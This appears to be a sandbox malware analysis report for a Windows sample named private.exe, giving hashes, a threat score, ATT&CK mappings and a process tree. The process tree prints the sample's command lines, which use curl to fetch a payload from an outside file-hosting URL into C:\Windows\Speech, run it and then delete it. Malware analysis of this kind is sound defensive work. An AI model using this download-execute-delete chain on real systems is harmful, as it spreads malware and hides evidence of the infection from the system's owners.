2ee5d62e9112121eeb1c152fc6a0a5319c8ebfa30ab49eeecba49a6b945feefb

Analysis

max time kernel
119s
max time network
120s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
15-01-2025 01:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

private.exe
Size

854KB
MD5

9b76a571d37a4d6b4507642a85674cc9
SHA1

e2cf7359c93b5de6f08566b7457ae13ec47b9f3f
SHA256

2ee5d62e9112121eeb1c152fc6a0a5319c8ebfa30ab49eeecba49a6b945feefb
SHA512

a98b338aec862c78a56836d29903897343ac0987089e6252abe42b0212438f44525319d0d92811744f49c4b52a08a901866c20a4b9f39041aa8075837ebd1733
SSDEEP

12288:lu47xRm/JGQl6CwkoH7Fso6veRSN2ff+zOe9egX7AlGeyn2rnIr9BqiXb1FP:lu47SBR6CwkTo60OegX7Aoeyn4m7Vj

Score

6^/10

defense_evasion

Malware Config

Signatures

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1708	private.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1708 wrote to memory of 1460	1708	private.exe	33
PID 1708 wrote to memory of 1460	1708	private.exe	33
PID 1708 wrote to memory of 1460	1708	private.exe	33
PID 1708 wrote to memory of 2164	1708	private.exe	32
PID 1708 wrote to memory of 2164	1708	private.exe	32
PID 1708 wrote to memory of 2164	1708	private.exe	32
PID 1708 wrote to memory of 1188	1708	private.exe	34
PID 1708 wrote to memory of 1188	1708	private.exe	34
PID 1708 wrote to memory of 1188	1708	private.exe	34
PID 1708 wrote to memory of 2312	1708	private.exe	35
PID 1708 wrote to memory of 2312	1708	private.exe	35
PID 1708 wrote to memory of 2312	1708	private.exe	35

C:\Users\Admin\AppData\Local\Temp\private.exe
"C:\Users\Admin\AppData\Local\Temp\private.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/Z01XJyuAz2yPo4d4/client.bin --output C:\Windows\Speech\client.exe
  2⤵
  PID:2164
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:1460
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\Speech\client.exe
  2⤵
  PID:1188
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del C:\Windows\Speech\client.exe
  2⤵
  PID:2312

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads